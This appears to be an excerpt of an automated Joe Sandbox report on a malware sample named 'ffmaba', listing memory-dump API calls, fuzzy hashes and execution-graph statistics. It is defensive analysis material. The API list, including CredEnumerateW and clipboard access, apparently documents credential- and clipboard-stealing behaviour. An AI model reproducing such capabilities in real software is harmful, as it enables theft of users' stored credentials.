                                                                            • API String ID: 2289755597-0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4564711094.0000000006290000.00000040.00000800.00020000.00000000.sdmp, Offset: 06290000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_6290000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: Clipboard
                                                                            • String ID:
                                                                            • API String ID: 220874293-0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4564711094.0000000006290000.00000040.00000800.00020000.00000000.sdmp, Offset: 06290000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_6290000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: Clipboard
                                                                            • String ID:
                                                                            • API String ID: 220874293-0
                                                                            APIs
                                                                            • CredEnumerateW.SECHOST(00000000,?,?,?), ref: 096782E3
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4568770378.0000000009670000.00000040.00000800.00020000.00000000.sdmp, Offset: 09670000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_9670000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: CredEnumerate
                                                                            • String ID:
                                                                            • API String ID: 3404281133-0
                                                                            APIs
                                                                            • CredEnumerateW.SECHOST(00000000,?,?,?), ref: 096782E3
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4568770378.0000000009670000.00000040.00000800.00020000.00000000.sdmp, Offset: 09670000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_9670000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: CredEnumerate
                                                                            • String ID:
                                                                            • API String ID: 3404281133-0
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,052CD94E,?,?,?,?,?), ref: 052CDA0F
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4558108362.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_52c0000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,052CB779,00000800,00000000,00000000), ref: 052CB98A
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4558108362.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_52c0000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,052CB779,00000800,00000000,00000000), ref: 052CB98A
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4558108362.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_52c0000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,052CB779,00000800,00000000,00000000), ref: 052CB98A
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4558108362.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_52c0000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 052CB6FE
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4558108362.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_52c0000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: eaf073d84fc05d65d2ab15987e231d1fc7d1307812fa05cd5b2c03743151732e
                                                                            • Instruction ID: a614526ec0725c71fa650d0cadaa2786e1f54724f953913979384595edceb37f
                                                                            • Opcode Fuzzy Hash: eaf073d84fc05d65d2ab15987e231d1fc7d1307812fa05cd5b2c03743151732e
                                                                            • Instruction Fuzzy Hash: 1B2125B1904240DFCB15DF58D980B16BB65EB84318F60C56ED90A4B376C33AD487CA61
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4509140545.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_142d000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a43061866971ea80011a9a50c0ad70cfa7678bf3e92f015cf4dd4c91425c3a21
                                                                            • Instruction ID: 56aae77a6d93930173819ffec65f3cccdde893023133fc75ad23057563ebc865
                                                                            • Opcode Fuzzy Hash: a43061866971ea80011a9a50c0ad70cfa7678bf3e92f015cf4dd4c91425c3a21
                                                                            • Instruction Fuzzy Hash: D0215BB1A04244DFDB01DF98D9C0B2BBB65FB88324F64C96ED8094B356C33AD486C661
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4509140545.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_142d000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 14e550bb31341f50a47c085520ae47c7c00ff6afeef95767a110e4782e603818
                                                                            • Instruction ID: 04b4c52272194632dfad17d0d435a3af3203d6d844215a9764895cdda7ef709f
                                                                            • Opcode Fuzzy Hash: 14e550bb31341f50a47c085520ae47c7c00ff6afeef95767a110e4782e603818
                                                                            • Instruction Fuzzy Hash: B22180755093808FDB13CF24D594716BF71EF46214F28C5DBD8498B6A7C33A984ACB62
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4508698795.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_130d000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                                                            • Instruction ID: 12bef6ff531beb03aebcd627822186893265cca6ecdaa0f92cc6ea9222500da1
                                                                            • Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                                                            • Instruction Fuzzy Hash: 8E11B176504280CFDB16CF54D5C4B16BFB1FB88328F24C6A9DD490B696C33AD45ACBA1
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4508698795.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_130d000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                                                            • Instruction ID: d35fecb79482228cf5da555e3c601f1cb5b03f5e13bee081d1271ebc2056dea8
                                                                            • Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                                                            • Instruction Fuzzy Hash: 7711E176404240CFDB02CF84D5C4B56BFB1FB84324F24C2A9D9091B257C33AE45ACBA1
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4509140545.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_142d000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f0ca1e03a89bf6502059eb4096cb2751f98ce07bc6b40026132c113bb1690e3e
                                                                            • Instruction ID: bd460110061caa30776f8e8e117cdee272fe87cdbf576fbcdaba3a41c7c3d7c9
                                                                            • Opcode Fuzzy Hash: f0ca1e03a89bf6502059eb4096cb2751f98ce07bc6b40026132c113bb1690e3e
                                                                            • Instruction Fuzzy Hash: 9711BF76904280CFDB12CF14D5C4B1AFF61FB84324F24C6AAD8494B756C33AD45ACBA2
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4509140545.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_142d000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                                                            • Instruction ID: 058754c6e111bb86080d64a2282f30c28ad0d2cda90681f234d7b2573d39a809
                                                                            • Opcode Fuzzy Hash: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                                                            • Instruction Fuzzy Hash: B711BB75904280DFDB02CF54C5C4B16BBA1FB85324F24C6AED8494B3A6C33AD44ACB61
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4508698795.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_130d000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9583b764ce9dc2cafb58cceb6f72dad5ab91a6fb07cb9be4c60ae795165d1ea3
                                                                            • Instruction ID: 1bb1446fc6f9ef2d809bdec732ba3991e2c4ced140377acc437a235372e557eb
                                                                            • Opcode Fuzzy Hash: 9583b764ce9dc2cafb58cceb6f72dad5ab91a6fb07cb9be4c60ae795165d1ea3
                                                                            • Instruction Fuzzy Hash: BB01A7710043849AE7229EDADDC4766FFD8DF41B38F58C41AEE094A2C6C3799840CA71
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4508698795.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_130d000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fe49b0c946dd811825fac958b373ba481b832150e79e7b7a4ee5bb985bb3141a
                                                                            • Instruction ID: 7c70da026a7395899d5a10377db7bf5296c50e1d112740a3003a5f1558ffbf81
                                                                            • Opcode Fuzzy Hash: fe49b0c946dd811825fac958b373ba481b832150e79e7b7a4ee5bb985bb3141a
                                                                            • Instruction Fuzzy Hash: 5FF062724043849EE7218E5ADDC4B66FFE8EF51734F18C45AFE084A28AC3799844CAB1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4568770378.0000000009670000.00000040.00000800.00020000.00000000.sdmp, Offset: 09670000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_9670000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LRcq
                                                                            • API String ID: 0-4134321033
                                                                            • Opcode ID: 298e5e52fe3e92ac38aa82fe1036250df3a81287479d22ae82d23a7380128c16
                                                                            • Instruction ID: ff42d315e39d0c4e24b0ae609faf625802eb476d34c1c3993c7f8aa9b0c7e109
                                                                            • Opcode Fuzzy Hash: 298e5e52fe3e92ac38aa82fe1036250df3a81287479d22ae82d23a7380128c16
                                                                            • Instruction Fuzzy Hash: 97F1C374E01219CFDB14DFA9D984B9DFBB2BF89300F2491AAD809AB355DB349981CF40
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.4568770378.0000000009670000.00000040.00000800.00020000.00000000.sdmp, Offset: 09670000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_9670000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2de3a77779b527198f19d74f12440ecbfc162c492536e6e7ac46b24fe53c49dc
                                                                            • Instruction ID: d697857207892c175d29f75ca3294629b3cee3f31151b97902e7156faa35e53c
                                                                            • Opcode Fuzzy Hash: 2de3a77779b527198f19d74f12440ecbfc162c492536e6e7ac46b24fe53c49dc
                                                                            • Instruction Fuzzy Hash: F441C075D01229DFCB65DF64D888AD9BBB2FF59301F1091EAE109A7261DB31AE81CF40

                                                                            Execution Graph

                                                                            Execution Coverage:7.2%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:42
                                                                            Total number of Limit Nodes:6

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32 ref: 0290D7BE
                                                                            • GetCurrentThread.KERNEL32 ref: 0290D7FB
                                                                            • GetCurrentProcess.KERNEL32 ref: 0290D838
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0290D891
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2319508460.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Offset: 02900000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_2900000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: Current$ProcessThread
                                                                            • String ID:
                                                                            • API String ID: 2063062207-0

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0290B6FE
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2319508460.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Offset: 02900000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_2900000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 029059A9
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2319508460.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Offset: 02900000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_2900000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 029059A9
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2319508460.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Offset: 02900000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_2900000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0290DA0F
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2319508460.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Offset: 02900000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_2900000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: 1447011f925a52a731ab6b67206727eb2e91336e2a1443e1b30f528dc2f4f703
                                                                            • Instruction ID: ed1875465f9ef9a6d1ad2a98dff6f9d42354bc4f0f22f82b33d84692cad92a31
                                                                            • Opcode Fuzzy Hash: 1447011f925a52a731ab6b67206727eb2e91336e2a1443e1b30f528dc2f4f703
                                                                            • Instruction Fuzzy Hash: 5A21E4B59002089FDB10CF9AD984ADEBBF9FB48310F14841AE914A3350D374A950CF61

                                                                            Control-flow Graph

                                                                            control_flow_graph 433 290b919-290b960 434 290b962-290b965 433->434 435 290b968-290b997 LoadLibraryExW 433->435 434->435 436 290b9a0-290b9bd 435->436 437 290b999-290b99f 435->437 437->436
                                                                            APIs
                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0290B779,00000800,00000000,00000000), ref: 0290B98A
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2319508460.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Offset: 02900000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_2900000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: 9df3c0563975536810c67eab93a877cff8837aeddc3e2ba26d7dd13f1cfda65a
                                                                            • Instruction ID: 7ce0d1acbf31487e106ce65e6a1ab2006bf22f5f34d17ac7fa31e81d81e60319
                                                                            • Opcode Fuzzy Hash: 9df3c0563975536810c67eab93a877cff8837aeddc3e2ba26d7dd13f1cfda65a
                                                                            • Instruction Fuzzy Hash: EE2144B6C002498FCB10CFAAC484AEEFBF4EB88314F14845AD469A7240C375A505CFA5

                                                                            Control-flow Graph

                                                                            control_flow_graph 440 290aeb0-290b960 442 290b962-290b965 440->442 443 290b968-290b997 LoadLibraryExW 440->443 442->443 444 290b9a0-290b9bd 443->444 445 290b999-290b99f 443->445 445->444
                                                                            APIs
                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0290B779,00000800,00000000,00000000), ref: 0290B98A
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2319508460.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Offset: 02900000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_2900000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: a29e59de5682f82c47531a59bea90425314e33ee004be6f06674192b3498ab93
                                                                            • Instruction ID: 41e9392b07a40563773a5cc994ac53e12326b2e6900f3bf39b24d9cf44e74d6b
                                                                            • Opcode Fuzzy Hash: a29e59de5682f82c47531a59bea90425314e33ee004be6f06674192b3498ab93
                                                                            • Instruction Fuzzy Hash: 771114B6D003099FCB10CF9AC484A9EFBF9EB48314F14842AD529A7240C375A944CFA5

                                                                            Control-flow Graph

                                                                            control_flow_graph 448 290b698-290b6d8 449 290b6e0-290b70b GetModuleHandleW 448->449 450 290b6da-290b6dd 448->450 451 290b714-290b728 449->451 452 290b70d-290b713 449->452 450->449 452->451
                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0290B6FE
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2319508460.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Offset: 02900000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_2900000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: 6c246c10264890d67e130f6b265dc51195110e8f484dd5a7b4867d02609b2040
                                                                            • Instruction ID: f94348436a4977dd6cf051d4afb7cdf6e16aad65557799d25874971ad49954eb
                                                                            • Opcode Fuzzy Hash: 6c246c10264890d67e130f6b265dc51195110e8f484dd5a7b4867d02609b2040
                                                                            • Instruction Fuzzy Hash: 0411E0B6C00349CFCB10CF9AC984ADEFBF9EB88324F14845AD429A7650C379A545CFA1
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2318686088.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_fcd000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ca3754a468c314b3302e6207018fbebff9e3ab15ca5eeb81cf8a8cd6289f4585
                                                                            • Instruction ID: 270f67eedab1cec0018c1161af5f379ada8ce226d29cc64aa9c6604a0d71c1f3
                                                                            • Opcode Fuzzy Hash: ca3754a468c314b3302e6207018fbebff9e3ab15ca5eeb81cf8a8cd6289f4585
                                                                            • Instruction Fuzzy Hash: AD2148B2504201DFCB09DF04CAC1F2ABF65FB98324F20C57CDA090B246C336E806E6A2
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2318787984.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_fdd000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 62679354c20699c90baf08f0b716c1eff7cde7eb24e9a5c1939d36d729533e22
                                                                            • Instruction ID: a68bf609fb7838219716bbfef791e777003d1984e2bb7a90b9ac026481b66b9a
                                                                            • Opcode Fuzzy Hash: 62679354c20699c90baf08f0b716c1eff7cde7eb24e9a5c1939d36d729533e22
                                                                            • Instruction Fuzzy Hash: 3821F575504200DFCB15DF14D988B16BB66EBC8324F28C56ED80A4B34AC33BD807DA61
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2318787984.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_fdd000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 27ecb8bd98d97445c403fa4edef4f4336a50573905aeb163e3820c060ea940eb
                                                                            • Instruction ID: 74d015b80852910283cc8a2b7c7463d9e78acf3a7ef1acc4f855d095e1485f49
                                                                            • Opcode Fuzzy Hash: 27ecb8bd98d97445c403fa4edef4f4336a50573905aeb163e3820c060ea940eb
                                                                            • Instruction Fuzzy Hash: 9B212971904204EFDB05DF54D9C0B26BB66FB84324F28C56ED8094B356C336D806DA61
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2318787984.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_fdd000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 97004345f20d8696bd2e4658834f7145fd3d469902f50e4442c1f086f9601c89
                                                                            • Instruction ID: c64ae5a54ad1dd098a1ad55de7e44ddbec0e3239678c03f3cbfc60d09e33186c
                                                                            • Opcode Fuzzy Hash: 97004345f20d8696bd2e4658834f7145fd3d469902f50e4442c1f086f9601c89
                                                                            • Instruction Fuzzy Hash: 5D2183755093808FC712CF24D594715BF71EB46314F28C5EBD8498B6A7C33A980ACB62
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2318686088.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_fcd000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                                                            • Instruction ID: 9d1e4aad458fbd1a49d0f8d522bf1d399fcbd233a89a5d98e3dd6642cdbfce8f
                                                                            • Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
                                                                            • Instruction Fuzzy Hash: 7A110376804241DFCB06CF00DAC4B1ABF71FB94324F24C2ADD9090B256C33AE85ADBA1
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2318787984.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_fdd000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                                                            • Instruction ID: 61b08c0f1cfa09ed366cb302552d5fda436d44e4ff9a42ad001d00c1e2e81375
                                                                            • Opcode Fuzzy Hash: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                                                            • Instruction Fuzzy Hash: 7911BB75904280DFCB06CF10C9C4B15BBB2FB84324F28C6AED8494B796C33AD80ADB61
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2318686088.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_fcd000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a18ecd0e07d75ce9850a13805e43f582dc26c7ec4910cace412b0baf57f0fa08
                                                                            • Instruction ID: 7ff578db3e6571c6c67b6827401990f2a3f4a40ff87af5c4236354966c967cd1
                                                                            • Opcode Fuzzy Hash: a18ecd0e07d75ce9850a13805e43f582dc26c7ec4910cace412b0baf57f0fa08
                                                                            • Instruction Fuzzy Hash: 28012B724053419AE7118B19CEC5F2AFFD8DF51330F18C82EEC090A286C3399840E671
                                                                            Memory Dump Source
                                                                            • Source File: 00000016.00000002.2318686088.0000000000FCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FCD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_22_2_fcd000_ffmaba.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a5b4249ea1270c74a141fbf5c66dd5427a761682535efc6f05b7d8df4bc80b12
                                                                            • Instruction ID: a4d2eb92b2c63acd5ef0345c386bf251b586cb3da68e5c2eae5c7564f9317bfc
                                                                            • Opcode Fuzzy Hash: a5b4249ea1270c74a141fbf5c66dd5427a761682535efc6f05b7d8df4bc80b12
                                                                            • Instruction Fuzzy Hash: 57F0C272405340AEE7208A0ACE84B66FFA8EF51734F18C45EED084A286C3799840DAB0

                                                                            Execution Graph

                                                                            Execution Coverage:0.2%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:43.4%
                                                                            Total number of Nodes:129
                                                                            Total number of Limit Nodes:21

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • memcpy.MSVCRT ref: 6C1DC19F
                                                                            • CRYPTO_secure_clear_free.LIBCRYPTO-1_1 ref: 6C1DC1C0
                                                                              • Part of subcall function 6C29F530: OPENSSL_cleanse.LIBCRYPTO-1_1 ref: 6C29F551
                                                                            • CRYPTO_realloc.LIBCRYPTO-1_1 ref: 6C1DC1EA
                                                                            • memset.MSVCRT ref: 6C1DC212
                                                                            • memset.MSVCRT ref: 6C1DC244
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C1DC277
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4518316604.000000006C181000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C180000, based on PE: true
                                                                            • Associated: 00000019.00000002.4518232416.000000006C180000.00000002.00000001.01000000.00000010.sdmp
                                                                            • Associated: 00000019.00000002.4518946336.000000006C352000.00000004.00000001.01000000.00000010.sdmp
                                                                            • Associated: 00000019.00000002.4519075992.000000006C353000.00000002.00000001.01000000.00000010.sdmp
                                                                            • Associated: 00000019.00000002.4519208105.000000006C3B9000.00000004.00000001.01000000.00000010.sdmp
                                                                            • Associated: 00000019.00000002.4519338110.000000006C3BB000.00000004.00000001.01000000.00000010.sdmp
                                                                            • Associated: 00000019.00000002.4519381215.000000006C3BE000.00000002.00000001.01000000.00000010.sdmp
                                                                            • Associated: 00000019.00000002.4519536690.000000006C3DF000.00000004.00000001.01000000.00000010.sdmp
                                                                            • Associated: 00000019.00000002.4519748860.000000006C3E0000.00000008.00000001.01000000.00000010.sdmp
                                                                            • Associated: 00000019.00000002.4519748860.000000006C3E3000.00000008.00000001.01000000.00000010.sdmp
